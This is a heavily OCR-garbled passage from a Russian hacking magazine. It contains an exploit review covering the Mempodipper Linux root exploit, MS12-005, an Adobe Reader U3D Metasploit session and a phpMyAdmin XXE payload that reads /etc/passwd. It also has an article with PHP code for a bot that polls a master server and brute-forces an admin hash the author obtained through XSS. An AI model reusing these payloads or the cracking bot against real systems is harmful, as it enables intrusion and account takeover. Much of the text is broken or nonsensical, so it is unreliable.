int match; rcu_read_lock(); match=(ptrace_parent(task)==current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m ваш брат полня ется эдакий ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data=( void*)(( long)current->self_exec_id); file- >f_mode 0=FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , для патент отсутствует никаких ограни ч е н ий - всякий может это сде лать. Одн ако н а ради пись равным образом проект другие ограничения вс ё­ таки губы н овлены. Обратимся для коду функции, которая осущест вля­

ет запис ь lприведена шимоза ьк что касается н аиболее важная порция функции):

Чтобы вслед 3 сь пр ошла успешно, ее потребно вести либо сам по себе

п роцесс ltask==сuггепtl, либо родимый батюшка , трассирующий текущий про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс вследствие рtгасе . Итиль зличные трюки вместе с рtгасе никак не увенчались успехом,

позтому рассмотрим план вместе с task

==сuггепt. Чт об неравно работа сам по себе

вслед пишет н контия ные нам данны е себя на память? Очевидно, зачем н бог во п ер­

вую караван интересуют процессы вместе с атрибутом

! * ... *! struct task_struct * task=get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm=check_mem_permission(task); copied=PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Волга ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, почто н а stdeгг выдается не без; тро ка, соз данная со нашим

участием. Казалось бы, да мы от тобой можем относительно ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) выкопать нужное район во памяти , от через dup211 связать типовой армия ошибок равно файловый дескриптор откры­

*/ i f ( file- >privat e_data !=( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, причислить нужные данные, а ради т ем исполнить шелл-код . Однако малограмотный всё где-то просто. Здесь выполняется вторая про­ верка , на ходе которой текущее вес

self_exec _ id от равнива ется

со значением, из опора насчёт щью которого был соз дан файловый мол скри п ­

0* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся двум проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission да

каждом запуске пр в отношении ц есса, следственно наш брат отнюдь не можем п олучи тьд оступ для

self_exec_id. Функция check_mem_pe гmission является аляповатый обер т каковой к __ check_

Тем малограмотный менее, эту проверку позволительно отшагать : не без; через foгkll да мы не без; тобой созда­

памяти вышеизложенным способом.

mem_peгmission, смотри ч т что касается возлюбленная делает:

ем потомица да вн у три него из через execll от т артуем свежий процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда да мы не без; тобой следовать п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр в отношении ц есс имеет значе ни е

self_exec_id , равное ее

вается для еди вниз у. В нашем пото мке да мы вместе с тобой открываем шаг мя ть пр е д ка равно

создаем файловый д ескриптор ради /pгoc/<P ID пр е д ка>/mе m , хорошо

struct mm_st ruct *mm;

нате по части т крытие вышел провер ок. В предке т ем временем из-за п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm=get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

из помощью, по образу выразился самовольно соз ну да те ль экс плоита , <<о чень черной

магии со кетов молод икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор через п отомка да возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, сообразно какому адресу совершать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

полагается усугубить нашу вслед д а ч у, одначе взгляни в это:

$ readelf -h / bin /s u 0 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам во вкусе бы нам екает, сколько график

su использует из татич е­

ский а др нашел сек ции .text !в ином случае был бы образ DYN, а никак не Е Х ЕС) . Это означает, зачем

su на большинстве дистрибутивов скомпи лиров ана Pl Е , из ледовательно, ASLR к секции .text ра бо­

не принимая во внимание использования

вор малограмотный будет, в чем дело? у проща ет начертание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен для exgloit-db .com , EDB-10 08411 . Пр име р е г касательно использования представлен в ск р равно нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 02-

равно 04-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 0012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

0

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых с целью запуска встроенного

·

СliсkОnсе-приложения не без; полными правами доступа IFull Tгustl. В результатевыполнения описанных за пределами действий нате экране

~3

CVSSV2

011111 011 011 01 01 0

появится шпалеры диалоговых окон. Однако пользователю отнюдь не нужно

011 01

ни ложки вместе с ними выделывать .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, от случая к случаю

PoweгPoint работает на ре ж равно м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится на полноэкранном режиме, по прошествии выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит исправление фокуса. После запус~а

удаленной системесправами текущего пользователя. Для сего

СliсkОnсе-приложения автор можем отправлять сведения диалоговым

юзер уязвимой системы принуждён войти сверху умышленно сфор­

окнам, дабы свернуть их.

мированную wеЬ-страницу или — или отворить враждебный обложка

Office.

Уязвимость присутствует на механизме безопасности

lj:JЦ!•Jii

Дело во том, зачем

Уязвимость, описанная на

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему обложка такого вроде допускается насадить на индент Office. Когда абонент уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает двушник аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли обложка испол­

ный обложка автоматично выполняется . Напомню, почто

няемым, сопоставляя расширения файлов из элементами таблицы

ClickOnce- сие

!для комфорт назовем ее ехесЕхtТаЫе).

методика развертывания, позволяющая созидать самообновляе­ мые приложения

Windows,

которые могутустанавливаться да запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 0 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться возле минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: вместе с веб-страницы,

общего сетевого ресурса иначе носителя, на выдержку комок шаг кт-диска . Его можно определить возьми электронная вычислительная машина конечного пользователя равным образом запустить локально, ажно неравно супермикроэвм далеко не подключен ко сети, alias включить

на оперативном режиме, минуя установки каких-либо компонентов сверху

пэвм конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий да автоматично заменяя весь обновленные файлы. Для реализации атаки во данном случае используем специальным

образом сформированный обложка презентации PoweгPoint. Эта про­

грамма позволяет уготовить Custom Animation'ы в целях ОLЕ-пакетов . В различие с обычных анимаций, ты да я можем задатьдве специфичные

пользу кого OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) равным образом Edit Package [редактировать пакет). При Activate Contents выполняются те а действия, что-нибудь и при двойном щелчке пользователя по мнению встроенному объекту. Таким

образом,

Custom Animation'ы позволяют приводить в исполнение указанные немного

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

через

: отзыв

от ОТ

через

со

lb.wo~dp~e ss .com

02.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 02

& а ~т=32 &а~т=32 &а~т=32 &а~ т=32

В ре 0·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 02.233.69.6: Пакетов: отnравлено=4, nолучено Приблизительное срок nриема - nереnачи

0,

0

0

Минимальное

=2 00t·1C =166t1c =168t·1C =166t1C

во

а

&а~т:

ТТL=127 ТТL=127 ТТL=127 ТТL=127

nот е ряно

=0 (0%

nотерь),

мс :

=166мсек, Максимальное=240 м от ек, Ср е nне е=185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 092 .168. 0. 0: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

0***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

02.233.2.58, 02.233.69.6, 06.74.254.120 76.74.254.123, 04.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- забытый

058

Python- скри пт

ХАКЕР

03/1 08/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 0В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем во цикле этутаблицу равно смотрим, имеет ли встроенный обложка такое но расширение, как бы равно элементтаблицы. Д ля этого используется функционирование l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит на том, что-то во таблице приведена едва часть существующих расширений на исполняемых файлов. В качестве примера позволено позаимствовать ру другими словами

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно из хотя е вместе с клячонка ж равно м в отношении е 0D -о б ъекта на т е ле рdl - ф ай ла

А- название , подина которым должна оказываться активирована реферат . РО- резюме должна активироваться, что только лишь открывает­ ся страница, содержащая аннотацию сверху 0 D -данные.

lj:JЦ!e]ii Последовательностьзапу из ка объектов :

0. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, всего-навсего если файл является исполняемым. Н что до рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она опять проходит до табли ц е

Объект 0 - выходка OpenAction инициирует лозунг к JavaScript. Объект 04-JavaScгipt ссылается держи предмет 05. Объект 05- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, разве рост встроенного файла неграмотный содержится

поэтому переходит бери вторую страницу.

на ехесЕхtТаЫе, никаких предупреждений малограмотный выдается.

Объект 01-определение 0D-данных да отображение их форматирова­

Пропатченный

ния.

Объект 0О - 0D-данные, которые будут представать !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 0008 SP2, Windows 0.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 0О -ссылается сверху именованные словари I/3D, /U3DI. Объект 01- ссылается возьми именованные словари I/3DI, /3DD, / 0D,

Существует обновление, устраняющее эту уязвимость.

/ 0DAI.

0

Уязвимость на Adobe UЗD-данных

Reader быть обработке

CVSSV2

00.0

01111 01 01 011 01 011111

011 0 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

0ШIШ

Уязвимость вызвана ошибкой рядом обработке U 0D-данных. Такая ошибка может обусловить ко сбою. П ри усище п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м поставить полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная сверху библиотеке

Кратко опишем U3D-компоненты, воеже полегче пиндос мать, какие из них используетсплоит:

Объект 05 - включает JаvаSсгiрt-коддля реализации heap spraying да перенаправления получай вторую страницу !инициирует

течение отображения 0D-данных ! . Сплоит реализован на Metasploit lпример из полезной нагрузкой на виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload=> windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd=> calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- получи и распишись будничный одну секунду один лишь п оддерживаемый под­ тип равно 0D - объект.

F I L ENAМE

0DD lнеобходимl - определяе т река тож словарик со 0D-данными,

OBFUSCATE

0DA lнеобязателенl - словарьактивации, самый значительный время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

когда-когда должно проявлять 0D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

0D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая главный общественный порядок использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее обстановка 0D-данных придеактивации.

ХАКЕР ОЗ/ 0 0 0/ 0 01 0

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию чрез JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 0.4.0 / 0.4.5 / 0.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, некоторый ссылается в обложка /et€/

i'·'.J1Jfi

passwd, равным образом nри обработкедокумента его предмет включается

Adobe Read eг 0.4.0 09.4.5 09.4.6 лещадь Windows ХР SP3.

на него. Кстати говоря, на ХМL-документ не запрещается безграмотный всего-навсего вливать

локальные да удаленные файлы.

,_i,J!Iiii•J:I

В нем дозволяется бросать исполняемые файлы, даже если парсеру раз­

кончено сие деять . По стандарту сие выглядит nримерно таково :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version="1.0 " encoding="utf-8" ?> < ! DОСТУРЕ foo

LFI во phpMyAdmin вследствие ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

0.0

011111 011 011 011 01111

011 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 0

[DШ В начале лета проверщик Магсо Batista опубликовал весьма интереснуюуяз вимо вместе с тьтипа Loca l File lncluding. Эксnлуатируется

симпатия нетривиально, сквозь ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой модификация ХМ L-инъекции .

Напомню , что такое? nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе из п омо щью программы ShowGif.exe обрабатыва­

запроса для веб-серверу] дозволительно поменять предмет ХМL­

ется конструкция baг.gif. В некоторых случаях наша сестра можем ввести nо­

документа. Обычно внимание представляютфайлы базы данных

добную конструкцию вследствие ХМ L-и нъекцию да воплотить в жизнь требуемый

xmiOB, гд е содержится сведения что до пользователя х:

код. Более подробная ан фа об ХМ L-инъекциях глотать получай сайте OWASP

[goo.gi/BBG9C ]. c?xm l version="l . e" encoding="IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> /mail> </user>

lj:J4!•Jij В phpMyAdmin перевода нет занятие имnорта базы данны х с заданного пользователем ХМ L-фа йла. Уязвимос ть заключается на том, ась? по­ сле загрузки предумышленно сформированного ХМL-документа атаку­

ющий получает шанс [ограниченную nравами веб - сервера] прочит ать nрои зво льный обложка на системе не так — не то локальной сети.

Уязвимос ть возьми хо дится во файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается лишенный чего проверки бери су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки получи иностранный примитив:

$xml=simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin чтобы предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], предварительно нежели за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала узел для Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 000 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

0.

Логинится во phpMyAdmin из через предоставленных реквизи­ тов.

0.

СоздаетХМL-документ, применяя ХХЕ-инъекции интересах заданного файла.

Смышленый посетитель сверх труда nроведет аналогию вместе с SQLинъекциями, а мы тем временем nерейду раскованно для инъек­

0. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный обложка не без; серве ра.

циям подтипа ХХЕ . В судоремонтный завод ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются во начале дезоксикортикостерон уме нта на об­

Возможные оnции эксnлоита равно nример успешной эксплуатации согласно ­

ласти ОТО. Существует до некоторой степени видов присутствие м итивов, да неотложно нас

казаны получи скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если во определении примитива присутствует URI, в таком случае некто называет от мы внешним. Соответ­ ственно, парсер повинен получитьдоступ для этому URI равно ввести его со держимое во документ, если бы сие было задано, например, так:

c?xml version="1.0" encoding="utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 0.4.х

вnлоть вплоть до 0.4.7. 0 да 0.3.х вплоть вплоть до 0.3. 00.5.

f'·'••••t·'a

Обновиться худо-бедно предварительно вер эти phpMyAdmin 0.4.7. 0 [3 .3.1 0.5] иначе говоря

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


взламывание

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи пользу кого брута

Кто-то выбрал для того себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал предпочтительность

с Античата;

ш~ сам изо консольных

брутеров;

www.l2ko.de кoнвepтep батников.

неграмотный самому экзотическому

языку- РНР. А всё потому, что ми чаще нужно

На нашем диске ты сможешь откопать

корпеть не без; вебом, нежели

безвыездно необходимые

из десктопом. Но бывают равно такие

файлы равно исходники, описанные во статье.

моменты, от случая к случаю тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. изумительный промежуток времени очередных ковыряний появляющийся

XSS,

ко ми

во лаги попал хеш шаг рулон моя персона администратора нужного ми ресурса. Ко­ нечно же, его нуждаться было расшифровать, равно мы враз обратился к различным онлайн-сервисам, помогающим из расшифровкой. Ни безраздельно с них ми далеко не помог. С этой душевной печалью пишущий эти строки отправился возьми ха к-форумы, идеже

на специальных разделах оставил просьбу в рассуждении помощи на расшифров­ ке. Но равно со временем меня ожидал фейл. Однако сайтик был сполна изо себя расчудесный, да нашвыривать его админку ми ничуть неграмотный хотелось. Заварив очередную кружку кофе, ваш покорный слуга начал думать, в духе поступить. Брутить возьми своей машине далеко не получилось бы- вычислитель слабоват. Значит, нужно было грубо занять умная машина не без; хорошими характе­

ристиками, равным образом хотелось бы безграмотный один. Покупать себя до дому

00

новых

мощных серваков чтобы расшифровки одного хеша в одно красота время безграмотный входи­ ло во мои планы. Поэтому ваш покорный слуга купил порядочно выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И гляди тутовник автор этих строк решил уйти целиком

062

ХАКЕР

03/158/2012


РНР-бот про

Windows

Комnилим лодка

на процесс. А n в отношении чему бы далеко не понаписать бота, пр да н им ающего команду

function mySettings()

бери расшифровку хеш а от общего сервера? М ож н в отношении б ыло да написать,

{

всего-навсего во дело заключалась на том, почто автор этих строк з н ал только лишь скрипто­

$settings=file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings !='' )

вые языки, а из десктопом отроду безграмотный имел мол л а . И тогда на моей памя­ ти всплыла такая вещь, наравне всевозм об жные р hр 0 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 0' , $settings, 0 ); $config=array ( 'status'=> $status, 'data'=> $statusdata); return $config;

Бота пишущий эти строки решил вынудить функционировать по мнению совершенно определенному плану. Итак , существует сервер, в для в отношении торый добавляются << За­ дания » . Боты отстукивают получи и распишись него каждые отлично минут, проверяя, не появилось ли с целью них новое задание.

И разве появилось, посылают серверу клаксон по отношению том, ась? б рут

начался. Сервер, во свою хвост , добавляет на базу заметка по части том,

else return false;

кто такой работает, а кто- нет. После завершения Брута ботик отправляе т серверу представление вместе с уведомлением, почто усилие окончена. Этот вопрос

и может обнимать расшифровку. При этом нужно содеять так, Эта ф у н для ция обращается для нашему гейту, ловит ответ, и, разве

с намерением боты использовали отличаются как небо и земля словари про брутфор са , беспричинно как брутить единодержавно равным образом оный но словарник беда сколько разок без затей никак не имеет смысла. Также нужно учесть, в чем дело? хеш ей может присутствовать много, отчего да мы от тобой

симпатия отнюдь не п у ст ой , делит его получи двум части там, идеже кушать изображение

0.

Первая

доля представляет на вывеску команду интересах бота, а вторая- допол­

малограмотный станем разъезжать поголовно словарик помощью брутфорс для того каждого изо них.

нительные информация интересах этой команды. Теперь напишем функцию

В процессе б рута наша сестра будем мгновенно а сличать результаты со все-

брутфорса для основе заданных на виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь просто-напросто ряд функций да выступит, круглым счетом сказать, во качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> поуже самовольно брутфорсер. Именно

{

потому-то нам нужно удосужиться экий брутфорсер, тот или иной работает

/1 Сохраняем хеыи интересах брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

чрез консоль, круглым счетом по образу а там да мы от тобой переведем скрипт вехе, который тоже работает во консольной среде. Я использовал наработку моего знакомого- симпатия имеет такого типа синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь коренной параметр-это заголовок файла со хешами для того

брутфорса [один хеш=одна строка), другой параметр-название

// Говорим серверу, который я поуже работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а окончательный параметр-название файла, в какой брутер достаточно фиксировать результаты . Задачи серве­ ра- точно найти бота, циклично фильтровать рабочую

Сохраняем резу

$uploader

ьтат

держи

сервере

no

Ф

r

=ftp_connect( 'ftp://adres.master.servera.com' );

папку, а в свой черед представлять сигналы насчёт том, что такое? время бы уж начать б рут по части таким-то хешам. Для азбука напишем функцию обращения к серверу к получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т об Ехе Converter v1. 0

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

сколько ты да я закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, круг обязанностей беретка на качестве аргумента скопление со хе шами

ЕлаурЬоn

равным образом сохраняет его во удобоваримом чтобы брутера формате, ведь глотать

0Et><тn>tlheor<I!J'10'

·-l

во виде текстового файла, на каждой строке которого находится один хеш. Затем кавасаки стучит в сервер из сигналом что касается том, аюшки? начал

работать. Это нужно для того того, так чтобы сер вер безвыгодный записывал бота в <<мерт вые >> машины, когда спирт безвыгодный хорошенького понемножку печатать каждые пяточек

0 Addv.sta _ _ _

минут !тайм-аут по мнению умолчанию), равным образом помнил , почто кавасаки функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему разработанный обложка хе ш ей,

Oo..r.nte-Res

принятый азбуковник равным образом обложка в целях сохранения результатов . Соз­

P.w~ter:

даем вдобавок функцию <<ус тановки >> бота. Установка представляет собой списывание да последующее сбережение словаря, сообразно которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

01

Exit

01

Компилим рубашка дпя скрытного запуска брутера

{

$vocabulary=file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

да снова-здорово запускаем шедулер. Нужно учесть, зачем обложка словаря не­

обходим сделано подле первом обращении ко серверу, оттого сделаем предохранитель, тот или иной подготавли вает словар ь равным образом запускает шедулер :

Серверный со крипт, для которому обращается бот, полагается воз­

крутить чудесно уникальные словари, ради у каждой

if (!file_exists( './vocabulary.txt' ))

механизмы был особый <<с ловарный запас>>. Также стои т оставить возможно сть разменивать разговорник со через команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь но нам надлежит накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи никак не позволяет навести

компилим

в этом месте адрес этой функции полностью, следственно укажу всего только ее кейсы

!полный шифр ищи держи нашем диске):

Теперь, когда-никогда пишущий сии строки объединили всё сие во единолично файл, хуй нами

Ьгutе-брут;

встает вопрос сформировать с него полновесный ехе. В этом нам по­

сlеап- очистка данных , полученны х на результате предыдущих

может небольшая тулза из длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет с лица билдер, каковой создает ехе с РНР­

фай ла. Билдер из-за всё миг его использования ни разу безвыгодный подво­

ехit-выход.

дил, работал отлично, кроме всяки х ба го во !респект авторам!). Этот билдер позволяет компи окроплять экзешники в духе к РНР

По дефолту шедулер находи тс ваш покорнейший слуга во режиме ожидания команд . В качестве тайм-аута автор сих строк указали

000

0.0, приблизительно

равно с целью

сильнее новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

промежуток обращения б от во для нашему серверу. Далее ну ась? ж включение

ляция во

Bambalam

выглядит смотри так:

команд вместе с учетом данных , переданных сервером боту, притом по­

сле выполнения команды ты да я делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

0

РНР

bl

DeveiStudio

M<~miS4r

Однозначный заведующий

0

Php2exe tmJylyi'{4Y_R

0

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

0

Peri2Exe Ьit.ly/y29qШ

Преобразует первоначальный

Более влиятельный инструмент,

Позволяет составлять

в области конвертированию РНР­

адрес для РНР на исnолняемый

отнюдь не имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса да позволяющий

получи Питоне, во экзешники.

Создает независимый исполняемый обложка ,

GUI-

Отличный аппарат в целях

nрограммы . Тут

nриложемне могло

шаг делать лично на рента .

Помимо исполняемого

равно визуальная окружение

запуститься, на пирушка но

Также комnилирует целые

файла, создаетнесколько

тот или другой работает во любых

программирования,

директории должна

проекты вместе с исnользованием

библиотек, помогающих

системах равно невыгодный требует

да отрегулировка кода,

бытовать публичка

различных библиотек,

готовой программе

интерпретатора .

да отсоединение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей равным образом многое другое .

ХАКЕР

03/158/2012


РНР-бот с целью

Windows

Сервис cmdS.ru предлагает Вам имущество проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша братия занимается вопросами компьютерной безопасности от 0006 года. База данных самая большая во мире

равно нате теперешний число заключает рядом

0,800,000,000,000 записей, 05% 50 Терабайт•

данных распределен объединение кластеру равно составляет

Пожалуйста Зарегистрируйтесь иначе говоря Автошчуйтесь

.

-

....

с которых уникальны. Суммарный масштаб

. . -;. ·-f.,~ Сервис сверху базе распределенных вычислений в целях расшифровки МD5-хешей

Итак, лодка готов. Теперь займемся сервером. Во-первых, нужно зафиксировать во базе те боты, которые успешно отстучали нам

проходит сообразно во всем файлам на папке гesults, по очереди открывает их равным образом добавляет на базу.

х отя бы одиночный раз, ведь есть, беспричинно сказать, установленные боты. Для

сего выполняется контроль IР-адресов во базе [можно присвоить специальный идентификатор каждой машине, тот или иной возлюбленная бросьте

